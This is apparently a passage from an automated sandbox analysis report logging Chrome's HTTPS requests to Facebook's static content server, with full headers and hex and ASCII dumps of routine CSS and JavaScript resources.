                                                                                                                                                                                                                                  Data Ascii: btn_thickbar{left:180px;position:absolute;top:-70px}.signup_area{margin-top:23px}.timelineLayoutLoggedOut .signup_btn{left:250px}.pas{padding:5px}.pa8{padding:8px}.pam{padding:10px}.pa16{padding:16px}.pal{padding:20px}.pts{padding-top:5px}.pt8{padding-to
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC2149INData Raw: 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 2d 31 70 78 3b 74 6f 70 3a 2d 31 70 78 7d 0a 2e 5f 34 2d 75 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 65 62 65 65 7d 2e 5f 32 61 31 6a 20 2e 5f 36 35 71 71 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 66 62 66 63 7d 2e 5f 36 35 71 71 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 2e 5f 34 36 39 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 5f 34 2d 75 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 35 37 38 65 35 7d 2e 5f 35 37 64 38 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 36 66 37 7d 2e 5f 34 2d 75 38 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 0a 2e 5f 35 38 35 6e 7b 62 61
                                                                                                                                                                                                                                  Data Ascii: tion:absolute;right:-1px;top:-1px}._4-u5{background-color:#e9ebee}._2a1j ._65qq{background:#fafbfc}._65qq{background:#fff}._469s{background-color:#000}._4-u7{background-color:#3578e5}._57d8{background-color:#f5f6f7}._4-u8{background-color:#fff}._585n{ba


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  23192.168.2.649748157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC604OUTGET /rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.css HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: zTiG3S2kohKGdwKyfo3uYQ==
                                                                                                                                                                                                                                  Expires: Tue, 23 Sep 2025 19:40:03 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: RFlnbe7m/3NaASMgJaQk2iXQ/zdUrqWtoVRy/eiBMMd6y4mns0LXhvKk6sIg/w12Mie+FsMV7xOMvHcWYRFurQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:16 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 16947
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1INData Raw: 2e
                                                                                                                                                                                                                                  Data Ascii: .
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 5f 35 31 6c 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 68 65 6c 76 65 74 69 63 61 20 6e 65 75 65 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 73 75 62 70 69 78 65 6c 2d 61 6e 74 69 61 6c 69 61 73 65 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 33 70 78 7d 2e 5f 39 6f 6e 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 61 33 38 33 65 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23
                                                                                                                                                                                                                                  Data Ascii: _51lp{background-clip:padding-box;display:inline-block;font-family:'helvetica neue', Helvetica, Arial, sans-serif;font-size:10px;-webkit-font-smoothing:subpixel-antialiased;line-height:1.3;min-height:13px}._9on4{background-color:#fa383e;border:2px solid #
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC562INData Raw: 7d 2e 5f 35 35 72 31 2e 5f 31 74 70 37 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 3a 6e 6f 74 28 2e 5f 31 34 38 38 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 46 46 46 20 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 75 2f 72 2f 50 6d 6a 53 6b 76 79 71 56 4d 2d 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 72 69 67 68 74 20 38 70 78 20 63 65 6e 74 65 72 7d 2e 5f 35 33 61 30 2e 5f 31 74 70 37 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 3a 6e 6f 74 28 2e 5f 31 34 38 38 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 35 46 36 46 37 20 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 75 2f 72 2f 50 6d 6a 53 6b 76 79 71 56 4d 2d 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 72 69 67 68 74 20 38 70 78 20 63 65 6e 74 65 72 7d 2e 5f 35 35 72 31 2e 5f 31 74
                                                                                                                                                                                                                                  Data Ascii: }._55r1._1tp7:not(:focus):not(._1488){background:#FFFFFF url(/rsrc.php/v3/yu/r/PmjSkvyqVM-.png) no-repeat right 8px center}._53a0._1tp7:not(:focus):not(._1488){background:#F5F6F7 url(/rsrc.php/v3/yu/r/PmjSkvyqVM-.png) no-repeat right 8px center}._55r1._1t


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  24192.168.2.649750157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC581OUTGET /rsrc.php/v3/y1/r/s1oFVSwofs5.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1946INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: JeQBSwe7uoLa+eQ9UCgPuA==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 06:20:14 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: v9B3bot1h2/1XM2iuCoO46VbSDnmgPbqD23zezn8R6+DKFReIP6e/sABn0dIYH1gvPZnFImq9XRVpMmyFsddPg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:16 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=12, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 354326
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 67 6c 6f 62 61 6c 54 68 69 73 7c 7c 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 73 65 6c 66 7c 7c 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 67 6c 6f 62 61 6c 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 5f 5f 6c 69 73 74 65 6e
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/"use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listen
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 75 6d 65 72 61 62 6c 65 3d 64 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 3b 64 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 3b 22 76 61 6c 75 65 22 69 6e 20 64 26 26 28 64 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 64 2e 6b 65 79 2c 64 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 26 26 61 28 62 2e 70 72 6f 74 6f 74 79 70 65 2c 63 29 3b 64 26 26 61 28 62 2c 64 29 3b 72 65 74 75 72 6e 20 62 7d 7d 28 29 3b 62 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 61 2c 62 29 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 62 26 26 62 2e 70 72
                                                                                                                                                                                                                                  Data Ascii: umerable=d.enumerable||!1;d.configurable=!0;"value"in d&&(d.writable=!0);Object.defineProperty(a,d.key,d)}}return function(b,c,d){c&&a(b.prototype,c);d&&a(b,d);return b}}();b.inheritsLoose=function(a,b){Object.assign(a,b);a.prototype=Object.create(b&&b.pr
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 74 68 3b 61 2b 2b 29 74 68 69 73 2e 24 32 5b 61 5d 2e 72 65 6d 6f 76 65 28 29 3b 74 68 69 73 2e 24 32 2e 6c 65 6e 67 74 68 3d 30 7d 2c 74 68 69 73 2e 24 31 3d 61 2c 74 68 69 73 2e 24 32 3d 62 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 69 73 46 6f 72 41 72 62 69 74 65 72 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 31 7c 7c 68 28 30 2c 32 35 30 36 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 31 3d 3d 3d 61 7d 3b 72 65 74 75 72 6e 20 61 7d 28 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 61 2e 70 65 72
                                                                                                                                                                                                                                  Data Ascii: th;a++)this.$2[a].remove();this.$2.length=0},this.$1=a,this.$2=b}var b=a.prototype;b.isForArbiterInstance=function(a){this.$1||h(0,2506);return this.$1===a};return a}();g["default"]=a}),98);__d("performance",[],(function(a,b,c,d,e,f){"use strict";b=a.per
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 28 62 29 7b 24 3d 62 2c 74 79 70 65 6f 66 20 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 21 75 61 26 26 28 75 61 3d 21 30 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 76 61 29 29 7d 76 61 72 20 78 61 3d 7b 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 3a 76 61 2c 73 65 74 75 70 3a 77 61 7d 3b 63 3d 7b 70 72 65 53 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 2e 69 67 6e 6f 72 65 4f 6e 45 72 72 6f 72 21 3d 3d 21 30 29 26 26 77 2e 73 65 74 75 70 28 52 29 2c 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 2e 69 67 6e 6f 72 65 4f 6e 55 6e 61 68 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 21 3d
                                                                                                                                                                                                                                  Data Ascii: (b){$=b,typeof a.addEventListener==="function"&&!ua&&(ua=!0,a.addEventListener("unhandledrejection",va))}var xa={onunhandledrejection:va,setup:wa};c={preSetup:function(a){(a==null||a.ignoreOnError!==!0)&&w.setup(R),(a==null||a.ignoreOnUnahndledRejection!=
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1500INData Raw: 65 2f 69 6e 69 74 22 2c 74 74 69 3a 22 74 74 69 5f 62 69 67 70 69 70 65 22 2c 64 69 73 70 6c 61 79 65 64 3a 22 61 6c 6c 5f 70 61 67 65 6c 65 74 73 5f 64 69 73 70 6c 61 79 65 64 22 2c 6c 6f 61 64 65 64 3a 22 61 6c 6c 5f 70 61 67 65 6c 65 74 73 5f 6c 6f 61 64 65 64 22 7d 2c 73 65 74 43 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 5f 44 4f 5f 4e 4f 54 5f 55 53 45 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 3d 61 7d 2c 67 65 74 43 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 72 65 71 75 69 72 65 43 6f 6e 64 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28
                                                                                                                                                                                                                                  Data Ascii: e/init",tti:"tti_bigpipe",displayed:"all_pagelets_displayed",loaded:"all_pagelets_loaded"},setCurrentInstance_DO_NOT_USE:function(a){g=a},getCurrentInstance:function(){return g}};e.exports=a}),null);__d("requireCond",[],(function(a,b,c,d,e,f){function a(
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC14884INData Raw: 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 69 66 28 28 68 7c 7c 28 68 3d 63 28 22 45 78 65 63 75 74 69 6f 6e 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 29 29 29 2e 69 73 49 6e 57 6f 72 6b 65 72 29 7b 61 28 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 7d 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 61 28 62 29 3b 6a 28 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 7d 67 2e 67 65 74 44 4f 4d 43 6f 6e 74 61 69 6e 65 72 4e 6f 64 65 3d 6a 3b 67 2e 62 61 74 63 68 44 4f 4d 49 6e 73 65 72 74 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 6f 62 6a 65 63 74 56 61 6c 75 65 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c
                                                                                                                                                                                                                                  Data Ascii: ||document.body);return i}function a(a){if((h||(h=c("ExecutionEnvironment"))).isInWorker){a(null);return}var b=document.createDocumentFragment();a(b);j().appendChild(b)}g.getDOMContainerNode=j;g.batchDOMInsert=a}),98);__d("objectValues",[],(function(a,b,
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 73 2e 24 33 3d 74 68 69 73 2e 24 33 7c 7c 6e 65 77 20 4d 61 70 28 29 3b 74 68 69 73 2e 24 33 2e 73 65 74 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 61 64 64 56 65 63 74 6f 72 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 24 33 3d 74 68 69 73 2e 24 33 7c 7c 6e 65 77 20 4d 61 70 28 29 2c 64 3d 74 68 69 73 2e 24 33 2e 67 65 74 28 61 29 7c 7c 5b 5d 3b 64 2e 70 75 73 68 28 62 29 3b 63 2e 73 65 74 28 61 2c 64 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 72 65 67 69 73 74 65 72 4f 6e 42 65 66 6f 72 65 53 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 34 2e 70 75 73 68 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 65 70 61 72 65 54 6f 53 65 6e 64 3d
                                                                                                                                                                                                                                  Data Ascii: s.$3=this.$3||new Map();this.$3.set(a,b);return this};b.addVectorElement=function(a,b){var c=this.$3=this.$3||new Map(),d=this.$3.get(a)||[];d.push(b);c.set(a,d);return this};b.registerOnBeforeSend=function(a){this.$4.push(a);return this};b.prepareToSend=
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 20 6e 65 77 20 45 72 72 6f 72 28 63 28 22 65 72 72 22 29 28 61 2e 6d 65 73 73 61 67 65 29 29 7d 7d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 62 2e 74 72 79 50 61 72 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 28 69 7c 7c 28 69 3d 64 28 22 55 52 49 53 63 68 65 6d 65 73 22 29 29 29 2e 4f 70 74 69 6f 6e 73 2e 49 4e 43 4c 55 44 45 5f 44 45 46 41 55 4c 54 53 29 3b 65 3d 6e 65 77 20 62 28 6e 75 6c 6c 2c 63 2c 65 2c 66 29 3b 72 65 74 75 72 6e 20 6a 28 65 2c 61 2c 21 31 2c 63 29 3f 65 3a 6e 75 6c 6c 7d 3b 62 2e 69 73 56 61 6c 69 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f
                                                                                                                                                                                                                                  Data Ascii: new Error(c("err")(a.message))}}a=function(a){babelHelpers.inheritsLoose(b,a);b.tryParse=function(a,c,e,f){e===void 0&&(e=(i||(i=d("URISchemes"))).Options.INCLUDE_DEFAULTS);e=new b(null,c,e,f);return j(e,a,!1,c)?e:null};b.isValid=function(a,c,e,f){e===vo
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC14884INData Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 4d 6f 64 75 6c 65 73 28 5b 62 2e 67 65 74 4d 6f 64 75 6c 65 49 64 41 73 52 65 66 28 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 22 70 72 65 6c 6f 61 64 3a 20 22 2b 63 29 7d 29 7d 3b 65 2e 65 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 3d 3d 3d 61 7c 7c 74 68 69 73 2e 24 31 3d 3d 61 2e 24 31 7d 3b 65 2e 67 65 74 4d 6f 64 75 6c 65 49 66 52 65 71 75 69 72 65 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 4a 53 52 65 73 6f 75 72 63 65 45 76 65 6e 74 73 22 29 2e 6e 6f 74 69 66 79 28 74 68 69 73 2e 24 31 2c 74 68 69 73 2e 24 32 2c 22 41 43 43 45 53 53 45 44 22 29 3b 72 65 74 75 72 6e 20 63 28 22 69 66 52 65 71 75 69 72 65 61 62 6c 65
                                                                                                                                                                                                                                  Data Ascii: unction(a){return a.loadModules([b.getModuleIdAsRef()],function(){},"preload: "+c)})};e.equals=function(a){return this===a||this.$1==a.$1};e.getModuleIfRequireable=function(){d("JSResourceEvents").notify(this.$1,this.$2,"ACCESSED");return c("ifRequireable


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  25192.168.2.649751157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC608OUTGET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC1903INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: 7NlAIdLIU8O43rggO6FzAA==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 23:35:38 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
